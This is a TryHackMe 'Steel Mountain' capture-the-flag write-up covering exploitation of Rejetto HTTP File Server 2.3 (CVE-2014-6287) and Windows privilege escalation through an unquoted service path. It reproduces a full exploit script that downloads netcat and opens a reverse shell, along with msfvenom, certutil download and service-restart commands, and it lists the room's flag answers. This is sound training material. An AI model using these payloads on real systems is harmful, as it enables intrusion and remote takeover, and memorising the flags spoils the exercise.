TryHackMe - Steel Mountain Writeup

# TryHackMe - Steel Mountain Writeup ###### tags: `writeup` `tryhackme` `SteelMountain` `Easy` ## :computer: Port Scanning First we make a nmap to the ip an we discover some webservers and that is a windows machine. ```bash # Nmap 7.92 scan initiated Mon Mar 28 11:28:46 2022 as: nmap -sV -T4 -sS -v -p- -oN Ports 10.10.55.10 Increasing send delay for 10.10.55.10 from 0 to 5 due to 989 out of 2472 dropped probes since last increase. Increasing send delay for 10.10.55.10 from 5 to 10 due to 11 out of 20 dropped probes since last increase. Nmap scan report for 10.10.55.10 Host is up (0.14s latency). Not shown: 65520 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 8.5 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 3389/tcp open ssl/ms-wbt-server? 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 8080/tcp open http HttpFileServer httpd 2.3 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49183/tcp open msrpc Microsoft Windows RPC 49184/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Mar 28 11:45:37 2022 -- 1 IP address (1 host up) scanned in 1011.52 seconds ``` - The web in port 80 contain info for some secundary flags. - The web in port 8080 is the main way to obtain the user flag and the root. ## :eye: Enumeration ### Source code We can see the first flag as a comment in the web hosted on the port 80, we can see going to this web and pressing **Ctrl+U**: ![](https://i.imgur.com/kQAcVdx.png) As we see in the image The name of the photo is Bill Harper with this info we know the who is the employee of the month and we have the first Flag. >Bill Harper ### Http File Server After that enumerating the web on the port 80, It looks like you have nothing else, it will be time to go to the one on port 8080, We discover a http file server and if we look on [exploit-db](https://www.exploit-db.com/) it has a exploit for RCE for this web app. ![](https://i.imgur.com/wVmSc2H.png) To know the exact program we can google it or click on [httpfileserver 2.3](http://www.rejetto.com/hfs/) that redirect to the info page of the webapp, next to knowing the exact app is we can found it on exploit-db and start exploiting it. With this we have three of four flags in task 2. Scan the machine with nmap. What is the other port running a web server on? >8080 Take a look at the other web server. What file server is running? >Rejetto HTTP File Server What is the CVE number to exploit this file server? >2014-6287 ## :bomb: Explotation This is the exploit: https://www.exploit-db.com/exploits/39161 ### :mag: Understanding the exploit: This Exploit works as a curious way: First it retrieves from a webserver a netcat binary, you have to edit and set your IP Address and Local Port, and start the server in the same directory where the compiled netcat binary is located. ```python #!/usr/bin/python # Exploit Title: HttpFileServer 2.3.x Remote Command Execution # Google Dork: intext:"httpfileserver 2.3" # Date: 04-01-2016 # Remote: Yes # Exploit Author: Avinash Kumar Thapa aka "-Acid" # Vendor Homepage: http://rejetto.com/ # Software Link: http://sourceforge.net/projects/hfs/ # Version: 2.3.x # Tested on: Windows Server 2008 , Windows 8, Windows 7 # CVE : CVE-2014-6287 # Description: You can use HFS (HTTP File Server) to send and receive files. # It's different from classic file sharing because it uses web technology to be more compatible with today's Internet. # It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. #Usage : python Exploit.py <Target IP address> <Target Port Number> #EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe). # You may need to run it multiple times for success! import urllib2 import sys try: def script_create(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}") def execute_script(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}") def nc_run(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}") ip_addr = "10.10.10.10" #local IP address local_port = "443" # Local Port number vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with" save= "save|" + vbs vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs" exe= "exec|"+vbs2 vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port exe1= "exec|"+vbs3 script_create() execute_script() nc_run() except: print """[.]Something went wrong..! Usage is :[.] python exploit.py <Target IP address> <Target Port Number> Don't forgot to change the Local IP address and Port number on the script""" ``` With the exploit downloaded and the ip and port changed we have to download a static binary of netcat from github: In this case we use this [file](https://github.com/skyformat99/netcat-for-windows/tree/master/1.12) but any static binary of netcat will be ok. After download it we have to set up a local web server in the **same directory** we download it, we can do it with php or other languages but this time i'm gonna use python3. ```bash python3 -m http.server 8080 ``` As we said before the exploit first download a the netcat binary in the target machine and the second time we run the exploit we receive a shell to the ip that we writed. ![](https://i.imgur.com/ezFzP4u.png) ![](https://i.imgur.com/aqcCdFj.png) To receive it we have to close the http server and set-up a netcat listener on our PC. After run the exploit twice we receive a shell on the target. ![](https://i.imgur.com/84YOK6H.png) ![](https://i.imgur.com/nE623jf.png) If we go to Bill Desktop we can see the flag: ![](https://i.imgur.com/pbzpGIA.png) With this we have the last question of task 2: >b04763b6fcf51fcd7c13abc7db4fd365 It's time to privesc! ### 🪜 ROOT PRIVESC At the beggining if we not have idea we can run [winpeas.bat](https://github.com/carlospolop/PEASS-ng/releases/tag/20220328) In this case the Room say to us that is a [Unquoted Service Path Vulnerability](https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#unquoted-service-paths) To enumerate the services we use some of this two commands: ```dos wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ ``` ```dos wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v """ ``` ![](https://i.imgur.com/v7Bm1Yg.png) To exploit this Vulnerability we need to understand how Windows search the files after understanding this we know that **AdvancedSystemCareService9** is not in quotes and it will be a explotable service. Now we have to generate the payload and upload to the directory of the machine. We have to go to: >C:\Program Files (x86)\IObit\ and download here with certutil but first generate the payload and start the web server with python: - To generate the payload we use msfvenom: ```bash msfvenom -p windows/shell_reverse_tcp LHOST=10.11.66.103 LPORT=80 -e x86/shikata_ga_nai -f exe -o Advanced.exe ``` - Then start the webserver: ![](https://i.imgur.com/1H6WI6j.png) - Download the file into the target machine with certutil: ```dos certutil -urlcache -f http://10.10.10.10:8080/Advanced.exe Advanced.exe ``` ![](https://i.imgur.com/EyHOS16.png) After that we create a nc listener in the port that we configured the payload(80 in this case) and we have to restart the service, to do it we use the following commands: ```dos sc stop AdvancedSystemCareService9 sc start AdvancedSystemCareService9 ``` After executing those commands we receive a **SYSTEM** shell in our nc listener and we can read the root flag. ![](https://i.imgur.com/6vmV02u.png) The root flag is: >9af5f314f57607c00fd09803a587db80 ### You can find me on: :bird:[**Twitter**](https://twitter.com/Aka_Mecanico) :desktop_computer: [**Github**](https://github.com/Mec4nico) :ballot_box_with_check: [**TryHackMe**](https://tryhackme.com/p/mech4nico) :green_book:[**HackTheBox**](https://www.hackthebox.eu/home/users/profile/336092)